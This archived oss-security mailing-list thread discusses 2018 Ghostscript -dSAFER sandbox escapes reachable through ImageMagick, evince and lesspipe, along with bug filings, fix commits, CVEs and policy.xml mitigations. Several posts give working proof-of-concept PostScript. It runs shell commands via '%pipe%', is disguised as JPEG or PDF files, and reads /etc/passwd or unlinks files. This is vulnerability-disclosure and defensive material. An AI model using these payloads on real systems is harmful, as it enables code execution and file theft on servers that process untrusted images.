Discussion:
More Ghostscript Issues: Should we disable PS coders in policy.xml by default?
(too old to reply)
Tavis Ormandy
2018-08-21 12:46:26 UTC
Permalink
Hello, this was discussed on the distros list, but it was suggested to move
discussion to oss-security.

You might recall I posted a bunch of -dSAFER sandbox escapes in ghostscript
a few years ago:

http://seclists.org/oss-sec/2016/q4/29

I found a few file disclosure, shell command execution, memory corruption
and type confusion bugs. There was also one that was found exploited in the
wild <http://ghostbutt.com/>. There was also a similar widely exploited
issue <https://imagetragick.com/> that could be exploited identically.

TL;DR: I *strongly* suggest that distributions start disabling PS, EPS, PDF
and XPS coders in policy.xml by default.

$ convert input.jpg output.gif
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

I've found a few more surprising ways to reach ghostscript recently, so
went back to look again and found a few more.

1. /invalidaccess checks stop working after a failed restore, so you can
just execute shell commands if you handle the error. Exploitation is very
trivial. Repro:

$ *gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null*
GS>*legal*
GS>*{ null restore } stopped { pop } if*
GS>*legal*
GS>*mark /OutputFile (%pipe%id) currentdevice putdeviceprops*
GS<1>*showpage*
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

(ImageMagick PoC at end of mail)

2. setcolor claims
<http://git.ghostscript.com/?p=ghostpdl.git;a=blob;f=psi/zcolor.c;h=4c0f25827e320ceaa9b510c98f9b1926532a26d5;hb=HEAD#l263>
no
operand checking is necessary, because it's hidden behind a pseudo-operator
of the same name. That's true, but you can still call it indirectly via
setpattern, so type checking is necessary. Repro:

$ *gs -q -sDEVICE=ppmraw -dSAFER*
GS>*<< /Whatever 16#414141414141 >> setpattern*
Segmentation fault

3. The LockDistillerParams boolean isn't type checked, so nice easy type
confusion. Repro:

$ *gs -q -sDEVICE=ppmraw -dSAFER*
GS>*<< /LockDistillerParams 16#4141414141414141 >> .setdistillerparams*
Segmentation fault


4. .tempfile permissions don't seem to work, I don't know when they broke.
You're not supposed to be able to open files outside of the patterns in
the PermitFileReading array, but that doesn't seem to work for me e.g.:
$
*strace -fefile gs -sDEVICE=ppmraw -dSAFER*
...
GS>*(/proc/self/cwd/hello) (w) .tempfile*
open("/proc/self/cwd/hello26E8LQ", O_RDWR|O_CREAT|O_EXCL, 0600) = 3
GS<2>*dup*
GS<3>*(hello) writestring*
GS<2>*closefile*

This means you can create a file in any directory (I don't think you can
prevent the random suffix). Additionally, I have a trick to let you read
and unlink any file you have permission to.

Here is how to unlink() any file:

$
*strace -fefile gs -sDEVICE=ppmraw -dSAFER*
...
GS>*{ .bindnow } stopped {} if*
GS>*(/etc/passwd) [] .tempfile*
GS<2>*.quit*
unlink("/etc/passwd") = -1 EACCES (Permission denied)
+++ exited with 0 +++

Reading is more complicated, because the best way I know how to do it is to
interpret a file as as PostScript and catch the syntax errors, here is an
example:

$ *cat fileread.ps <http://fileread.ps>*
/FileToSteal (/etc/passwd) def
errordict /undefinedfilename {
FileToSteal % save the undefined name
} put
errordict /undefined {
(STOLEN: ) print
counttomark {
==only
} repeat
(\n) print
FileToSteal
} put
errordict /invalidfileaccess {
pop
} put
errordict /typecheck {
pop
} put
FileToSteal (w) .tempfile
statusdict
begin
1 1 .setpagesize
end
quit
$ *gs -q -sDEVICE=ppmraw -dSAFER fileread.ps <http://fileread.ps>*
GPL Ghostscript 9.23:
STOLEN: root:x:0:0:root:
STOLEN: daemon:x:1:1:daemon:/bash/bin/root:(/etc/passwd)
STOLEN: bin:x:2:2:bin:/nologin/sbin/usr/sbin:/usr(/etc/passwd)
STOLEN: sys:x:3:3:sys:/nologin/sbin/usr/bin:(/etc/passwd)
STOLEN: sync:x:4:65534:sync:/nologin/sbin/usr/dev:(/etc/passwd)
STOLEN: games:x:5:60:games:/sync/bin/bin:(/etc/passwd)

This can be used to steal arbitrary files from webservers that use
ImageMagick by encoding file contents into the image output, see my
previous PoC here <http://www.openwall.com/lists/oss-security/2016/09/29/3> for
an example. i.e. You can make convert malicious.jpg thumbnail.jpg produce
an image with the contents of a file visible.

These bugs were found manually, I also wrote a fuzzer and I'm working on
minimizing a very large number of testcases that I'm planning to report
over the next few days. I will just file those issues upstream and not post
each individual one here, you can monitor https://bugs.ghostscript.com/ if
you want to. I expect there to be several dozen unique bugs.

In the meantime, I really *strongly* suggest that distributions start
disabling PS, EPS, PDF and XPS coders in policy.xml by default. I think
this is the number one "unexpected ghostscript" vector, imho this should
happen asap. IMHO, -dSAFER is a fragile security boundary at the moment,
and executing untrusted postscript should be discouraged, at least by
default.

Please note, ImageMagick sends some initialization commands to ghostscript
that breaks my minimal PoC, but you can just undo their changes in
PostScript.

This one works for me on the version in Ubuntu:
$ *cat shellexec.jpeg*
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
$ *convert shellexec.jpeg whatever.gif*
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

For CentOS, try this:

$ *cat shellexec.jpeg*
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
$ *convert shellexec.jpeg whatever.gif*
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Thanks, Tavis.
Tavis Ormandy
2018-08-21 14:48:22 UTC
Permalink
Post by Tavis Ormandy
$ convert input.jpg output.gif
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
My colleague Jann Horn pointed out evince (which uses libgs, which is
affected with some tweaks to the PoC) is used to generate previews in
Nautilus, which means previews can trigger code execution (see
/usr/share/thumbnailers/evince.thumbnailer). I think it's possible to
trigger that via file automatic download in a browser just by visiting a
URL, but I haven't tested it.

I think those thumbnails should be disabled, but you've probably noticed I
think everything related to untrusted ghostscript should be disabled :-)

Tavis.
Bob Friesenhahn
2018-08-21 15:00:26 UTC
Permalink
Post by Tavis Ormandy
I think those thumbnails should be disabled, but you've probably noticed I
think everything related to untrusted ghostscript should be disabled :-)
I have posted to the GraphicsMagick Announcements mailing list
regarding your findings (with a link to this list) and suggested that
a fool-proof solution is that Ghostscript should be uninstalled.

Uninstalling Ghostscript entirely might cause software using libgs to
not execute at all unless a stub library is put in its place.

Dependencies on Ghostscript are much larger than one would initially
think due to Postscript being the traditional output from Unix
software for "printing" and thus it is used as an intermediate format
in order to convert between formats. EPS content is also embedded in
some other formats.

Bob
--
Bob Friesenhahn
***@simple.dallas.tx.us, http://www.simplesystems.org/users/bfriesen/
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
Alex Gaynor
2018-08-21 15:21:15 UTC
Permalink
A small note. Both ImageMagick and GraphicsMagick process various file
formats that can nest a different image file inside of them. These are very
frequently implemented with a call to ReadImage(), with no checking that
it's the expected file format. (As a result, the fuzzer finds various
impressive chains, with sometimes 3 different image formats nested inside
of each other).

The conclusion of this is that people _must not_ attempt to do their own
format detection and then pass the data to IM/GM, because this can be
bypassed with nested formats. It's imperative that GS truly be disabled
with either policy.xml or by uninstall GS.

Alex

On Tue, Aug 21, 2018 at 11:01 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Tavis Ormandy
I think those thumbnails should be disabled, but you've probably noticed
I
Post by Tavis Ormandy
think everything related to untrusted ghostscript should be disabled :-)
I have posted to the GraphicsMagick Announcements mailing list
regarding your findings (with a link to this list) and suggested that
a fool-proof solution is that Ghostscript should be uninstalled.
Uninstalling Ghostscript entirely might cause software using libgs to
not execute at all unless a stub library is put in its place.
Dependencies on Ghostscript are much larger than one would initially
think due to Postscript being the traditional output from Unix
software for "printing" and thus it is used as an intermediate format
in order to convert between formats. EPS content is also embedded in
some other formats.
Bob
--
Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
All that is necessary for evil to succeed is for good people to do nothing.
Tavis Ormandy
2018-08-21 20:12:43 UTC
Permalink
Thanks Alex.

FWIW, not all of these are visible, but I've started filing bugs, I'll file
a few more today and then let the developers work through the most serious
ones.

699654 /invalidaccess checks stop working after a failed restore
699655 missing type checking in setcolor
699656 LockDistillerParams boolean missing type checks
699659 missing type check in type checker (!)
699657 .tempfile SAFER restrictions seem to be broken
699658 Bypassing PermitFileReading by handling undefinedfilename error
699660 shading_param incomplete type checking
699661 pdf14 garbage collection memory corruption
699662 calling .bindnow causes sideeffects
699663 .setdistillerkeys memory corruption
699664 corrupt device object after error in job

I'm working on getting reproducers working for the developers for all bugs.
Post by Alex Gaynor
A small note. Both ImageMagick and GraphicsMagick process various file
formats that can nest a different image file inside of them. These are very
frequently implemented with a call to ReadImage(), with no checking that
it's the expected file format. (As a result, the fuzzer finds various
impressive chains, with sometimes 3 different image formats nested inside
of each other).
The conclusion of this is that people _must not_ attempt to do their own
format detection and then pass the data to IM/GM, because this can be
bypassed with nested formats. It's imperative that GS truly be disabled
with either policy.xml or by uninstall GS.
Alex
On Tue, Aug 21, 2018 at 11:01 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Tavis Ormandy
I think those thumbnails should be disabled, but you've probably
noticed
Post by Bob Friesenhahn
I
Post by Tavis Ormandy
think everything related to untrusted ghostscript should be disabled
:-)
Post by Bob Friesenhahn
I have posted to the GraphicsMagick Announcements mailing list
regarding your findings (with a link to this list) and suggested that
a fool-proof solution is that Ghostscript should be uninstalled.
Uninstalling Ghostscript entirely might cause software using libgs to
not execute at all unless a stub library is put in its place.
Dependencies on Ghostscript are much larger than one would initially
think due to Postscript being the traditional output from Unix
software for "printing" and thus it is used as an intermediate format
in order to convert between formats. EPS content is also embedded in
some other formats.
Bob
--
Bob Friesenhahn
http://www.simplesystems.org/users/bfriesen/
Post by Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
All that is necessary for evil to succeed is for good people to do nothing.
AmitB
2018-08-22 18:09:12 UTC
Permalink
I also took a look a copule weeks ago at few of the patches for your
previous bugs from 2 years ago, and found that one of them is incomplete
and still allowing RCE (https://bugs.ghostscript.com/show_bug.cgi?id=697178)

POC:
------------------
$ cat poc.jpg
%!PS
<< (ICCProfilesDir) (%pipe%id > /dev/) >> .setuserparams
currentdevice null true mark /OutputICCProfile (tty)
.putdeviceparams
showpage
$ identify poc.jpg
uid=1000(amit) gid=1000(amit) groups=1000(amit)

After reviewing all of the comments in the original bug report I saw that
you actually mentioned this issue, but it was not taken under
consideration/forgotten for some reason.
So effectively a public RCE PoC has been avaliable for GhostScript for
almost 2 years.

I opened a report two weeks ago at bugs.ghostscript.com:
699623 Incomplete fix for #697178 Allowing -dSAFER bypass

But I got no response from them until today.
If you have others channels of contact with them please let them know about
this one too.
Post by Tavis Ormandy
Thanks Alex.
FWIW, not all of these are visible, but I've started filing bugs, I'll file
a few more today and then let the developers work through the most serious
ones.
699654 /invalidaccess checks stop working after a failed restore
699655 missing type checking in setcolor
699656 LockDistillerParams boolean missing type checks
699659 missing type check in type checker (!)
699657 .tempfile SAFER restrictions seem to be broken
699658 Bypassing PermitFileReading by handling undefinedfilename error
699660 shading_param incomplete type checking
699661 pdf14 garbage collection memory corruption
699662 calling .bindnow causes sideeffects
699663 .setdistillerkeys memory corruption
699664 corrupt device object after error in job
I'm working on getting reproducers working for the developers for all bugs.
Post by Alex Gaynor
A small note. Both ImageMagick and GraphicsMagick process various file
formats that can nest a different image file inside of them. These are
very
Post by Alex Gaynor
frequently implemented with a call to ReadImage(), with no checking that
it's the expected file format. (As a result, the fuzzer finds various
impressive chains, with sometimes 3 different image formats nested inside
of each other).
The conclusion of this is that people _must not_ attempt to do their own
format detection and then pass the data to IM/GM, because this can be
bypassed with nested formats. It's imperative that GS truly be disabled
with either policy.xml or by uninstall GS.
Alex
On Tue, Aug 21, 2018 at 11:01 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Tavis Ormandy
I think those thumbnails should be disabled, but you've probably
noticed
Post by Bob Friesenhahn
I
Post by Tavis Ormandy
think everything related to untrusted ghostscript should be disabled
:-)
Post by Bob Friesenhahn
I have posted to the GraphicsMagick Announcements mailing list
regarding your findings (with a link to this list) and suggested that
a fool-proof solution is that Ghostscript should be uninstalled.
Uninstalling Ghostscript entirely might cause software using libgs to
not execute at all unless a stub library is put in its place.
Dependencies on Ghostscript are much larger than one would initially
think due to Postscript being the traditional output from Unix
software for "printing" and thus it is used as an intermediate format
in order to convert between formats. EPS content is also embedded in
some other formats.
Bob
--
Bob Friesenhahn
http://www.simplesystems.org/users/bfriesen/
Post by Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
All that is necessary for evil to succeed is for good people to do
nothing.
Bob Friesenhahn
2018-08-22 21:16:34 UTC
Permalink
The CERT advisory at https://www.kb.cert.org/vuls/id/332928 provides a
policy.xml example which does not appear to block PS2 and PS3, which
are also entry points for reading Postscript.

Bob
--
Bob Friesenhahn
***@simple.dallas.tx.us, http://www.simplesystems.org/users/bfriesen/
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
Tavis Ormandy
2018-08-23 03:33:37 UTC
Permalink
On Wed, Aug 22, 2018 at 2:17 PM Bob Friesenhahn <
Post by Bob Friesenhahn
The CERT advisory at https://www.kb.cert.org/vuls/id/332928 provides a
policy.xml example which does not appear to block PS2 and PS3, which
are also entry points for reading Postscript.
I think (luckily) there's no magic that will invoke those, but I think
you're right, for completeness they should be disabled by default as well.

Tavis.
Leonardo Taccari
2018-08-22 21:36:44 UTC
Permalink
Hello Bob,
Post by Bob Friesenhahn
The CERT advisory at https://www.kb.cert.org/vuls/id/332928 provides a
policy.xml example which does not appear to block PS2 and PS3, which
are also entry points for reading Postscript.
[...]
If I am not missing something I think that ghostscript isn't used
for them though.
Mateusz Lenik
2018-08-23 11:29:23 UTC
Permalink
Hello,
Post by Leonardo Taccari
Post by Bob Friesenhahn
The CERT advisory at https://www.kb.cert.org/vuls/id/332928 provides a
policy.xml example which does not appear to block PS2 and PS3, which
are also entry points for reading Postscript.
[...]
If I am not missing something I think that ghostscript isn't used
for them though.
It seems to be possible to disable GhostScript in ImageMagick completely by
the policy rule below. It's not possible to miss any format with it.

<policy domain="delegate" rights="none" pattern="gs" />

I also found out that Amit's exploit works with lesspipe that ships with
less by default -- it uses gs via ps2ascii wrapper

Best,
Mateusz
Leonardo Taccari
2018-08-23 12:44:40 UTC
Permalink
Hello Mateusz,
Post by Mateusz Lenik
[...]
It seems to be possible to disable GhostScript in ImageMagick completely by
the policy rule below. It's not possible to miss any format with it.
<policy domain="delegate" rights="none" pattern="gs" />
[...]
Please note that this will work *only* when ImageMagick is built
with `--without-gslib'. In that case ImageMagick is not linked
against gslib and ghostscript is directly invoked via `gs' or
similar.

If ImageMagick was built `--with-gslib' then no `gs' is invoked
and there is no delegation, so the problems described by Tavis can
be reproduced with that delegate policy rule as well.


It is probably safer to follow the workaround described in:
<https://www.kb.cert.org/vuls/id/332928>
Bob Friesenhahn
2018-08-23 12:58:51 UTC
Permalink
Post by Leonardo Taccari
Hello Bob,
Post by Bob Friesenhahn
The CERT advisory at https://www.kb.cert.org/vuls/id/332928 provides a
policy.xml example which does not appear to block PS2 and PS3, which
are also entry points for reading Postscript.
[...]
If I am not missing something I think that ghostscript isn't used
for them though.
You are missing something. While they are unlikely to be triggered by
default (but still could be triggered by an attacker with sufficient
control), testing shows that

convert -verbose PS2:file.ps outfile.png
convert -verbose file.ps2 outfile.png
convert -verbose PS3:file.ps outfile.png
convert -verbose file.ps3 outfile.png

does in fact invoke Ghostscript.

Bob
--
Bob Friesenhahn
***@simple.dallas.tx.us, http://www.simplesystems.org/users/bfriesen/
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
Leonardo Taccari
2018-08-23 13:33:33 UTC
Permalink
Hello Bob,
Post by Bob Friesenhahn
You are missing something. While they are unlikely to be triggered by
default (but still could be triggered by an attacker with sufficient
control), testing shows that
convert -verbose PS2:file.ps outfile.png
convert -verbose file.ps2 outfile.png
convert -verbose PS3:file.ps outfile.png
convert -verbose file.ps3 outfile.png
does in fact invoke Ghostscript.
Whoops, I stand corrected, sorry for the incorrect information!
(at least when invoking them with the `PS2:' or `PS3:' prefixes,
anyway, yes, both PS2 and PS3 policy rules are worth to be added
as well).

(Regarding the `file.ps2' and `file.ps3' examples without `PS2:' or
`PS3:' prefixes according `convert -debug Policy -log "%e"' it seems
that they ends up as:

Domain: Coder; rights=Read; pattern="PS" ...

...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)

JFTR, not related to PS2 and PS3 but also a possible ghostcript
consumer: EPT seems to ends up as `pattern="PS"' too (unlike PS2
and PS3).


Thank you!
Bob Friesenhahn
2018-08-23 15:03:40 UTC
Permalink
Post by Leonardo Taccari
(Regarding the `file.ps2' and `file.ps3' examples without `PS2:' or
`PS3:' prefixes according `convert -debug Policy -log "%e"' it seems
Domain: Coder; rights=Read; pattern="PS" ...
...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)
This is likely due to header magic detection (e.g. "%!PS-Adobe"). It
is possible that a different path will be taken if the common
Postscript header is not detected. The file extension may then be
used as a hint. Also, there are a wide varieties of ImageMagick
versions in use, with a wide variety of behaviors.

The version of ImageMagick provided by the Ubuntu Linux I am using at
this moment dates from 2012!

Bob
--
Bob Friesenhahn
***@simple.dallas.tx.us, http://www.simplesystems.org/users/bfriesen/
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
Tavis Ormandy
2018-08-27 23:02:46 UTC
Permalink
Here is an update, Artifex made a press release
<https://www.darkreading.com/prnewswire2.asp?rkey=20180824UN89145&filter=3930>
listing
some necessary commits, but the list was incomplete.

Here is a list of relevant commits I'm aware of so far, some issues are
still open with working exploits available. It's my understanding that no
new release is planned until late September, and vendors need to either
ship a git snapshot when all issues are resolved, or apply patches. I have
testcases for each problem, but I think the bugs will be visible eventually
so I'm not posting them here.

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699671
handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0edd3d6c63
# 699659 missing type check in ztype
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=78911a01b6 #
699654 A /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5516c614dc33 #
699654 B /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=79cccf641486 #
699654 C /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b326a716 # 699655
- missing type checking in setcolor
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c3476dde # 699656
- LockDistillerParams boolean missing type checks
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42
# 699658 - Bypassing PermitFileReading by handling undefinedfilename errors
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0b6cd1918e1ec4ffd087400a754a845180a4522b
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e01e77a36cbb2e0277bc3a63852244bec41be0f6
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c432131c3f
# 699661 - pdf14 garbage collection memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=971472c83a345a16dac9f90f91258bb22dd77f22
# 699663 - .setdistillerkeys memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=241d911127
# 699664 - corrupt device object after error in job
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0d3901189f
# 699657 - .tempfile SAFER restrictions seem to be broken
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8e9ce5016db968b40e4ec255a3005f2786cce45f
# 699665 - memory corruption in aesdecode
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b575e1ec42
# 699668 - .definemodifiedfont memory corruption if /typecheck is handled

Tavis

On Thu, Aug 23, 2018 at 8:05 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Leonardo Taccari
(Regarding the `file.ps2' and `file.ps3' examples without `PS2:' or
`PS3:' prefixes according `convert -debug Policy -log "%e"' it seems
Domain: Coder; rights=Read; pattern="PS" ...
...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)
This is likely due to header magic detection (e.g. "%!PS-Adobe"). It
is possible that a different path will be taken if the common
Postscript header is not detected. The file extension may then be
used as a hint. Also, there are a wide varieties of ImageMagick
versions in use, with a wide variety of behaviors.
The version of ImageMagick provided by the Ubuntu Linux I am using at
this moment dates from 2012!
Bob
--
Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
Perry E. Metzger
2018-08-27 23:43:51 UTC
Permalink
Post by Tavis Ormandy
Here is an update, Artifex made a press release
<https://www.darkreading.com/prnewswire2.asp?rkey=20180824UN89145&filter=3930>
listing
some necessary commits, but the list was incomplete.
They also claimed "Artifex Software is pleased to report that the
recently disclosed security vulnerabilities in Ghostscript have been
resolved.", which, even if they were all patched in their git
repository, which they don't seem to all be, would still not really
be true given the lack of an actual release.
Post by Tavis Ormandy
Here is a list of relevant commits I'm aware of so far, some issues
are still open with working exploits available. It's my
understanding that no new release is planned until late September,
and vendors need to either ship a git snapshot when all issues are
resolved, or apply patches. I have testcases for each problem, but
I think the bugs will be visible eventually so I'm not posting them
here.
If someone would put a git repo onto GitHub with all the available
patches applied on a branch, I'm sure a bunch of people would be
grateful.

Perry
--
Perry E. Metzger ***@piermont.com
Marcus Meissner
2018-08-28 09:25:17 UTC
Permalink
Hi,

I had 4 CVEs assigned yesterday afternoon already working from CERTs list,
see inline comments below. Please adjust if something is incorrect in them.

CERT has mailed overnight that they will take care of the CVE assignment, so
I am defering the rest to them.

Ciao, Marcus
Post by Tavis Ormandy
Here is an update, Artifex made a press release
<https://www.darkreading.com/prnewswire2.asp?rkey=20180824UN89145&filter=3930>
listing
some necessary commits, but the list was incomplete.
Here is a list of relevant commits I'm aware of so far, some issues are
still open with working exploits available. It's my understanding that no
new release is planned until late September, and vendors need to either
ship a git snapshot when all issues are resolved, or apply patches. I have
testcases for each problem, but I think the bugs will be visible eventually
so I'm not posting them here.
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699671
handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0edd3d6c63
# 699659 missing type check in ztype
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=78911a01b6 #
699654 A /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5516c614dc33 #
699654 B /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=79cccf641486 #
699654 C /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b326a716 # 699655
- missing type checking in setcolor
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c3476dde # 699656
- LockDistillerParams boolean missing type checks
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42
CVE-2018-15910
Post by Tavis Ormandy
# 699658 - Bypassing PermitFileReading by handling undefinedfilename errors
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0b6cd1918e1ec4ffd087400a754a845180a4522b
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e01e77a36cbb2e0277bc3a63852244bec41be0f6
# 699660 - shading_param incomplete type checking
CVE-2018-15909
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c432131c3f
# 699661 - pdf14 garbage collection memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=971472c83a345a16dac9f90f91258bb22dd77f22
# 699663 - .setdistillerkeys memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=241d911127
# 699664 - corrupt device object after error in job
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0d3901189f
# 699657 - .tempfile SAFER restrictions seem to be broken
CVE-2018-15908
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8e9ce5016db968b40e4ec255a3005f2786cce45f
# 699665 - memory corruption in aesdecode
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b575e1ec42
CVE-2018-15911
Post by Tavis Ormandy
# 699668 - .definemodifiedfont memory corruption if /typecheck is handled
Tavis
On Thu, Aug 23, 2018 at 8:05 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Leonardo Taccari
(Regarding the `file.ps2' and `file.ps3' examples without `PS2:' or
`PS3:' prefixes according `convert -debug Policy -log "%e"' it seems
Domain: Coder; rights=Read; pattern="PS" ...
...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)
This is likely due to header magic detection (e.g. "%!PS-Adobe"). It
is possible that a different path will be taken if the common
Postscript header is not detected. The file extension may then be
used as a hint. Also, there are a wide varieties of ImageMagick
versions in use, with a wide variety of behaviors.
The version of ImageMagick provided by the Ubuntu Linux I am using at
this moment dates from 2012!
Bob
--
Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi. 3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <***@suse.de>
Tavis Ormandy
2018-08-29 20:14:41 UTC
Permalink
Thanks Marcus, here are some more necessary commits:

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=520bb0ea7519aa3e79db78aaf0589dae02103764
# 699654 D /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5b5536fa88a9e885032bc0df3852c3439399a5c0
# 699670 gssetresolution memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699671 handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699676 PDF interpreter can leave dangerous operators available

Please note that not all issues are resolved, and I have exploits that
still work against HEAD.

For example, this will still work if you pull master as of this writing:

$ cat testcase.pdf
%!PS
% This is ghostscript bug #699687 (split out from bug #699654)

a0 % just select a papersize to initialize page device

% You can't def HWResolution (for example), because currentpagedevice is
readonly:
%
% GS>currentpagedevice wcheck ==
% false
%
% But you can just put or astore into it, because the array itself is
writable:
% GS>currentpagedevice /HWResolution get wcheck ==
% true
%
% If you put some junk in there, then grestore stops working.
currentpagedevice /HWResolution get 0 (foobar) put

% this grestore will fail, `stopped` just handles the error instead of
aborting.
{ grestore } stopped {} if

% now LockSafetyParams will be incorrectly unset, you can check like this:
% GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get
== pop
% false

% we can change and configure devices now, so make sure we're using one with
% a OutputFile property.
(ppmraw) selectdevice

% run a shell command
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
$ evince testcase.pdf
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
(libspectre) ghostscript reports: ioerror -12

Tavis.
Post by Marcus Meissner
Hi,
I had 4 CVEs assigned yesterday afternoon already working from CERTs list,
see inline comments below. Please adjust if something is incorrect in them.
CERT has mailed overnight that they will take care of the CVE assignment, so
I am defering the rest to them.
Ciao, Marcus
Post by Tavis Ormandy
Here is an update, Artifex made a press release
<
https://www.darkreading.com/prnewswire2.asp?rkey=20180824UN89145&filter=3930
Post by Tavis Ormandy
listing
some necessary commits, but the list was incomplete.
Here is a list of relevant commits I'm aware of so far, some issues are
still open with working exploits available. It's my understanding that no
new release is planned until late September, and vendors need to either
ship a git snapshot when all issues are resolved, or apply patches. I
have
Post by Tavis Ormandy
testcases for each problem, but I think the bugs will be visible
eventually
Post by Tavis Ormandy
so I'm not posting them here.
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
Post by Tavis Ormandy
# 699671
handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0edd3d6c63
# 699659 missing type check in ztype
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=78911a01b6 #
699654 A /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5516c614dc33 #
699654 B /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=79cccf641486 #
699654 C /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b326a716 #
699655
Post by Tavis Ormandy
- missing type checking in setcolor
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c3476dde #
699656
Post by Tavis Ormandy
- LockDistillerParams boolean missing type checks
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42
CVE-2018-15910
Post by Tavis Ormandy
